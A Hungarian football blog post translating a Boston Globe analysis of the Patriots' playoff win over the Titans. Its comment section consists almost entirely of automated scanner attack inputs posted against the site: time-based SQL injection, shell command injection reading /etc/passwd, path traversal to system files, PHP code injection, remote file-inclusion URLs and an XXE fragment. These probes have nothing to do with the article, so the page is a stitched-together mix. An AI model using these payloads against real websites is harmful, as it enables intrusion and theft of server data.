A New England-i sikerrecept

2018. január 19., 10:01

A konfdöntőket felvezető cikksorozatunk legújabb része a híres kagylóleves helyett a Patriots múlt heti gálájára fókuszál.

A New England-i sikerrecept

Az alábbi cikk Ben Volin munkájának fordítása Kájzerszóze által, mely a bostonglobe.com oldalon jelent meg.

A Patriots két koordinátora már nem lesz sokáig New Englandben. Josh McDaniels komoly esélyese a Colts főedzői posztjának, Matt Patricia pedig minden bizonnyal már alá is írt a Lions-hoz. Múlt szombat este a Titans ellen a két koordinátor bebizonyította, miért is olyan felkapottak ők ketten.

McDaniels erődemonstrációt tartott a Patriots 35-14-es győzelmével, bemutatta, hogy a Patriots a jól megérdemelt pihenőhétét bölcsen, eredményesen használta. A mérkőzés újranézése során McDaniels kreatív játékhívásai újra és újra visszaköszöntek. Az egész az első playben kezdődött, egy 6 yardos swing-passzal Danny Amendolának.

A második negyed vége felé közeledve ugyanezzel a játékkal és felállással támadott a Patriots (Amendola a snap előtt keresztbe fut Brady előtt), de ezúttal a swing-passz nem ment Amendolának, csak egy fake volt, amit a linebacker persze elhitt és rá is mozdult, míg a pálya közepén kényelmesen egyedül maradt Gronkowski egy sima 13 yardos elkapással. A védő ebben az esetben a mérkőzés elején már beengedett Amendola játékot akarta megakadályozni, de hibát követett el.


Aztán a harmadik negyed elején a Patriots fake end-aroundot játszott el Amendolával (nagyjából a swing-passzhoz hasonlóan), a védők itt megint csak pórul jártak, mert Amendola helyett egy 9 yardos screen-passz ment Dion Lewisnek.

Majd jött a Lewisnak dobott screen-passz 31 yardért. Ismét egy Patriots-féle átverés volt, ezúttal Brandin Cooks alakította a csalit. Erre négy Titans védő is keményen ráharapott, míg a pálya jobb oldala teljesen nyitott volt Lewisnak és a blokkoló csapattársak armadájának.

A McDaniels által a második negyedben bevetett no-huddle offense kellett a Patriotsnak az offense beindításához. Pontosan így lehetett elérni, hogy a Titans védelem ne cserélhessen, ezzel pedig több komoly mismatch-et tudtak kialakítani (passzjátéknál pl. Amendolára a linebacker Wesley Woodyard figyelt), amely stratégia rövid idő alatt 21 szerzett pontot eredményezett.

És ott volt még Gronkowski 27 yardos elkapása a harmadik negyed közepén, ami azért volt lehetséges, mert a játékot fullbackként kezdte, és mint blokkoló játékost átengedte a védelem. Ez segített neki abban, hogy tisztára játsza magát és megcsinálja a playt.

De Patriciát így sem szárnyalhatta túl Josh McDaniels.

Blitzek nélkül is sikerült a Patriots defense-nek 8 sacket összehoznia. Némelyik azért volt, mert a Titánok a második félidőben jelentős hátrányban nyilvánvalóan passzjátékra álltak fel. De volt olyan, ami azért született, mert Patricia bevetette Marquis Flowers-t és Kyle Van Noy-t is spyként, így sikerült Marcus Mariota-t a zsebben tartani. A két spy védő végig lesben állt és Mariotát figyelte, ezzel megakadályozva, hogy kilépjen a zsebből, vagy futhasson. A Patriots csak három védőt küldött passz-sietettésre, de Mariota a spynak köszönhetően sehová sem futhatott. Béna kacsa volt csak a Patriots pass rushereknek, könnyen levadászták.

Amikor a Tennessee-nél már úgy gondolták, hogy a Patriots védelmét kiismerték, Flowers fake spy-t játszott el, fél másodperccel késleltette a blitzet, majd érintetlenül rohanta le Mariotát.

McDaniels és Patricia már épp elég rutinnal és tudással rendelkeznek, hogy vezetőedzők legyenek. De ha mégsem, a szombati győzelem minden bizonnyal megszépíti az önéletrajzukat.

Egyéb megfigyelések az újranézés után:

 

Mikor a Patriots-nál volt a labda

■ A Titans védelmi koordinátora, Dick LeBeau, a zone-blitz és általában a zónavédelem mestere, szombaton színt váltott. A Titans szinte minden esetben emberfogást hívott és bár néhányszor blitzeltek is, a védelem hátralépve többnyire Brady-t igyekezett hibára kényszeríteni. Az irányító 6/8-as mutatóval passzolt 54 yardért a zónavédelem ellenében, és 29/45-ből 283 yardot ért el három touchdownnal az emberfogás ellen. Az 53 passzolási kísérleténél a Titans mindössze 10-szer blitzelt, ezekből Brady pedig hat passzt csinált 57 yardért.

LeBeau megpróbálta teljesen lefedetni a területet, de Brady szétzilálta ezt az Amendola, a Lewis és a James White felé dobott passzokkal. LeBeau megpróbált szoros emberfogást játszani...

 

... de Brady kétszer is szép összjátékot hozott össze Gronkowskival gyönyörű külső vállra dobott passzokkal. Mindkettő első kísérletet ért.

LeBeau az első negyedben egyáltalán nem hívott blitzet, a másodikban aztán öt blitzet küldött Bradyre. Egyik sem működött, mivel a Titans-t egyszerűen lejátszotta a Patriots képzett személyzete.

■ Az emberfogás használatával LeBeau lehetővé tette McDanielsnek, hogy manipulálja a sakkbábukat...

Az egyik taktika, amelyet a Patriots többszörösen használt,hogy elkapókkal túlterhelte a mezőny egyik oldalát - ezáltal a védekező játékosokat a pályának arra az oldalára mozgatta -, majd a gyenge oldalon ment a futás. White különösen szép 6-yardosat futott, sőt még többet is meg kellett volna tennie, mivel a Patriots tökéletesen fenn tudta tartani a három baloldali védő blokkját.

 ■ Brady nagyszerű védelmet is kapott. 53 passzolási kísérleténél egyszer sem sackelték és csak négyszer ütötték meg. Nate Solder megszenvedett kicsit Jurrell Casey-vel az első félidőben, de egyébként a Patriots támadófala Brady-t tiszta zsebben tartotta, és Brady képes volt a zsebben mozogva megvárni, hogy az elkapók üresre játszák magukat. És Brandon Bolden 2 yardos touchdown futása során még soha nem láthattunk ekkora nagy lyukat gólvonali szituációban. David Andrews, Shaq Mason és James Develin lenyűgöző munkájának eredményeként azon a lyukon még egy Mack kamion is átfért volna.

■ A Titánok mindent eszközt bevetettek, hogy lelassítsák Gronkowski-t. Az All-Pro safety Kevin Byard általában a Titans hátsó-védelmi központja, Gronkowski-t a legtöbb játékban ő fedezte, mégis engedélyezett hatból öt Gronk elkapást (beleértve a touchdownt is). A Tennessee Gronkot a line of scrimmage-en egy defensive enddel jammelte, majd Johnathan Cyprien besegítésével duplázta, sőt két linebackert is állított a védelmi stáb középre (Avery Williamson és Woodyard), hogy kizárhassák a rövid passzokat. Gronkowski csak a harmadik leginkább célzott elkapó volt (9), Amendola (13) és Lewis (10) mögött.

■ A gólvonalnál Gronkowski a szokott módon két ember általi fedezést igényel védelem részéről. Viszont a második negyedben Cyprien úgy döntött, hogy White-ot kettőzi a gólvonal tájékán, így a hátsó zóna nyitva maradt Chris Hogannek, ennek eredménye egy 4 yardos touchdown elkapás lett.

■ Logan Ryannek aktív napja volt, de a Patriots két futójátékánál is a rossz oldalon helyezkedett el. A harmadik negyed egyik játékánál Brady akár "meg is vacsorázhatott volna” a zsebben, mikor Ryan egyszerűen elvesztette Amendola útvonalát, ezzel lehetővé tette, hogy a WR középen nyisson tiszta utat magának 27 yardért. Ryan hibázott Brady ominózus kifordult helyzetből indított löbbölésénél is harmadik és 10-re, a negyedik negyedben.

■ Cooks kilencszer volt célpont, de csak három elkapást tudott feltenni 32 yardért, mivel az újonc cornerback Adoree Jackson leste minden mozdulatát. 17 mérkőzéssel a hátuk mögött kijelenthető, hogy Cooks és Brady még mindig nem ugyanazon a hullámhosszon vannak. Közvetlenül Hogan TD-je előtt Brady második kísérletre incomplete-et dobott, pedig ebből könnyű Cooks TD születhetett volna. Brady a pálya közepső részét vette célba, számítva Cooks helyezkedésére, de az elkapó elrontotta az útvonalát és kifelé tartott eközben, így soha nem is látta a passzt.

 

Mikor a Titans-nél volt a labda

■ A Titans (mára már csak korábbi) edzője, Mike Mularkey a meccs után azt nyilatkozta, hogy Mariota combfeszítőizma az első negyedben meghúzódott, ami mintha elvette volna Mariota futóképességét. Az első negyedben kétszer futott összesen 22 yardért, míg a második negyedben egy 9 yardos, a harmadik negyedben egy 6 yardos futással jelentkezett.

Azonban a Patriots kémtechnikája kulcsfontosságú volt Mariota zsebben tartására. Mikor a Patriots nem alkalmazta ezt a meccs elején, Adam Butler, Flowers és Deatrich Wise túlságosan fennragadtak, Mariota pedig a 3. & 7-re egy szép 11 yardos futást csinált.

De a harmadik negyed elején Van Noy "spy"-ként való jelenléte tartotta az irányítót sikerrel zsebben, ezzel téve lehetővé Butlernek, hogy tiszta sacket mutathasson be.

■ James Harrison nagy felhajtással érkezett New Englandbe a pass rush repertoárja nyomán, ezzel szemben ismét a futások megállítása volt nála a prioritás. Kezdetben csak az első és a második kísérleteknél használták és az első 12 snapje közül 7 volt futójáték. Ezúttal erős oldali linebackert játszott (a Jets ellen gyenge oldalon kapott helyet), és egy hihetetlen játékot mutatott be a mérkőzés elején, mely során lerázta Delanie Walker blokkját, majd Derrick Henry-t egy kézzel ránotta le yardveszteség nélkül.

Harrison csak a második negyed végén kapott nyomásgyakorlói feladatokat, mivel a Titans innentől már kénytelen volt főként passzjátékkal operálni. Főleg zónafedezésben lépett pályára, mint a Jets ellen is, de három alkalommal emberfogásban is szerepet kapott, mikor Henry vagy a csere TE, Luke Stocker ellen állt fel.

Pályán töltött snapek szerinti lebontása: Pass-siettetés 14; futás 10; zónázás 3, emberfogás 3. JH 30 playt játszott múlt szombaton, összesen 57-et az utóbbi két meccsén, miután csak 40 snapet játszott a Steelers-ben az egész szezonban.

■ Amikor Harrison passz-siettetőként ténykedett, Taylor Lewan baloldali tackle ellen állt fel és nem tudott nyomást gyakorolni. De ez tette lehetővé Trey Flowers és Wise számára, hogy a jobb oldalon a csere RT Dennis Kelly ellen kedvezőbb felállásban legyenek és ők ott kiválóan is teljesítettek. Harrison a harmadik negyed elején még egy büntetésbe is belehajszolta Jonnu Smith TE-t, holding miatt 2. & 3-ból lett 2. & 13., hogy a Titans két játékkal később puntolni kényszerüljön.

■ Van Noy szintén lenyűgöző játékot nyújtott döntő szituációban, Henry negyedik és egyre hívott futásánál a második negyed végén. Két blokkolót vett fel sikerrel, ennek eredményeképp Stephon Gilmore tisztán bejutott a résbe és kívülre kényszerítette Henryt.

Ahogy Henry kívülre szorult, a Pats védelem csapatostul szerelte őt Malcolm Butler vezérletével.

■ A Patriots nem kevergette, váltogatta a cornerbackjeit. Gilmore volt a bal, Butler a jobb oldalon, ami lehetővé tette a Patriots számára, hogy leplezhessék emberfogást vagy zónavédekezést játszanak épp. A Patriots meglepő mennyiségű zónavédekezést hívott (főként a Cover 3-at), de a kémtechnika lehetővé tette számukra, hogy rengeteg emberfogást is játszhassanak, mert közben mindig figyelte valaki Mariotát.

■ Eric Rowe esetében ez a kitűnő szerelések napja volt, Taywan Taylort harmadik és 7-nél pálya szélén 5 yard után vágta be a fűbe, majd később a cipőjénél kapta el Smith-t négy yard megtétele után. Jó méreteivel és szerelőképességével könnyű megérteni, hogy miért lett Rowe Jonathan Jones helyett a harmadik számú cornerback a védelemben.

■ Butler mindkét TD elkapást Corey Davis-nek engedte, holott mindkét játékban fantasztikus védekezést produkált. Néha nem tehetsz mást, csak a kalaplengetéssel díjazod a másik fickó zsenialitását.

■ A Patriots védekezésében a legnyilvánvalóbb, hogy milyen gyorsan tanulnak a hibáikból. A Titans az elején néhány nagyobb játékkal büntette őket - a Mariota 11-yardos futása 3.& 7-nél, valamint a Walker 36 yardos elkapása, amikor Patrick Chung elment a flat útvonalra és a pálya közepe üresen maradt. Ám a Patriots a második félidőben mindössze egy 20 yardot meghaladó játékot engedélyezett, miközben hétszer zsákolták Mariotát.

Bónuszként az NFL Network elemzője, Brian Baldinger szemlélteti ezt egy gyönyörű példával:

 

A vasárnapi meccseket beharangozó cikksorozat előző részei:
Mire számíthat Doug Pederson az NFC döntőben?
Mi az Eagles támadójátékának kulcsa?


Hozzászólások

több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
response.write(9155973*9324149)
több mint 5 éve
Törölt felhasználó
'+response.write(9155973*9324149)+'
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
"+response.write(9155973*9324149)+"
több mint 5 éve
Törölt felhasználó
&cat /etc/passwd&
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
'&cat /etc/passwd&'
több mint 5 éve
Törölt felhasználó
20 and sleep(4)
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
"&cat /etc/passwd&"
több mint 5 éve
Törölt felhasználó
SomeCustomInjectedHeader:injected_by_wvs
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20 or (sleep(4)+1) limit 1 --
több mint 5 éve
Törölt felhasználó
cat /etc/passwd
több mint 5 éve
Törölt felhasználó
../../../../../../../../../../etc/passwd
több mint 5 éve
Törölt felhasználó
SomeCustomInjectedHeader:injected_by_wvs
több mint 5 éve
Törölt felhasználó
20' and sleep(4)='
több mint 5 éve
Törölt felhasználó
`cat /etc/passwd`
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
több mint 5 éve
Törölt felhasználó
SomeCustomInjectedHeader:injected_by_wvs
több mint 5 éve
Törölt felhasználó
|cat /etc/passwd#
több mint 5 éve
Törölt felhasználó
20' and (sleep(4)+1) limit 1 --
több mint 5 éve
Törölt felhasználó
../../../../../../../../../../etc/passwd.jpg
több mint 5 éve
Törölt felhasználó
'|'ld
több mint 5 éve
Törölt felhasználó
20" and sleep(4)="
több mint 5 éve
Törölt felhasználó
268435455
több mint 5 éve
Törölt felhasználó
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
"|"ld
több mint 5 éve
Törölt felhasználó
20' or (sleep(4)+1) limit 1 --
több mint 5 éve
Törölt felhasználó
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
több mint 5 éve
Törölt felhasználó
;cat /etc/passwd;
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
több mint 5 éve
Törölt felhasználó
20" or (sleep(4)+1) limit 1 --
több mint 5 éve
Törölt felhasználó
${99702+100153}
több mint 5 éve
Törölt felhasználó
/../..//../..//../..//../..//../..//etc/passwd.jpg
több mint 5 éve
Törölt felhasználó
';cat /etc/passwd;'
több mint 5 éve
Törölt felhasználó
1e309
több mint 5 éve
Törölt felhasználó
20'=sleep(4)='
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
több mint 5 éve
Törölt felhasználó
";cat /etc/passwd;"
több mint 5 éve
Törölt felhasználó
1some_inexistent_file_with_long_name%00.jpg
több mint 5 éve
Törölt felhasználó
20"=sleep(4)="
több mint 5 éve
Törölt felhasználó
'"\'\");|]*{
<>
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
/etc/passwd
több mint 5 éve
Törölt felhasználó
||cat /etc/passwd
több mint 5 éve
Törölt felhasználó
 testasp.vulnweb.com/t/fit.txt?%00.jpg
több mint 5 éve
Törölt felhasználó
20&n953199=v950722
több mint 5 éve
Törölt felhasználó
20;select pg_sleep(4); --
több mint 5 éve
Törölt felhasználó
)
több mint 5 éve
Törölt felhasználó
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
több mint 5 éve
Törölt felhasználó
&dir
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20';select pg_sleep(4); --
több mint 5 éve
Törölt felhasználó
testasp.vulnweb.com
több mint 5 éve
Törölt felhasználó
!(()&&!|*|*|
több mint 5 éve
Törölt felhasználó
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
több mint 5 éve
Törölt felhasználó
'&dir&'
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20; waitfor delay '0:0:4' --
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
^(#$!@#$)(()))******
több mint 5 éve
Törölt felhasználó
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
"&dir&"
több mint 5 éve
Törölt felhasználó
20'; waitfor delay '0:0:4' --
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
több mint 5 éve
Törölt felhasználó
|dir
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20"; waitfor delay '0:0:4' --
több mint 5 éve
Törölt felhasználó
file:///etc/passwd
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
'|dir
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
/\../\../\../\../\../\../\../etc/passwd
több mint 5 éve
Törölt felhasználó
"|dir
több mint 5 éve
Törölt felhasználó
;print(md5(acunetix_wvs_security_test));
több mint 5 éve
Törölt felhasználó
'"()
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
 testasp.vulnweb.com/t/xss.html?%00.jpg
több mint 5 éve
Törölt felhasználó
WEB-INF/web.xml
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
';print(md5(acunetix_wvs_security_test));$a='
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
acunetix_wvs_invalid_filename
több mint 5 éve
Törölt felhasználó
WEB-INF\web.xml
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
";print(md5(acunetix_wvs_security_test));$a="
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
comment
több mint 5 éve
Törölt felhasználó
../../../../../../../../../../windows/win.ini
több mint 5 éve
Törölt felhasználó
 testasp.vulnweb.com/t/fit.txt
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
${@print(md5(acunetix_wvs_security_test))}
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
több mint 5 éve
Törölt felhasználó
comment
több mint 5 éve
Törölt felhasználó
../../../../../../../../../../boot.ini
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
${@print(md5(acunetix_wvs_security_test))}\
több mint 5 éve
Törölt felhasználó
1'"
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
../../../../../../../../../../windows/win.ini.jpg
több mint 5 éve
Törölt felhasználó
comment/.
több mint 5 éve
Törölt felhasználó
//www.acunetix.tst
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
\
több mint 5 éve
Törölt felhasználó


]>
&acunetixent;
több mint 5 éve
Törölt felhasználó
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
................windowswin.ini
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20'"()&%
több mint 5 éve
Törölt felhasználó
@@ZTKkm
több mint 5 éve
Törölt felhasználó
..\..\..\..\..\..\..\..\windows\win.ini
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó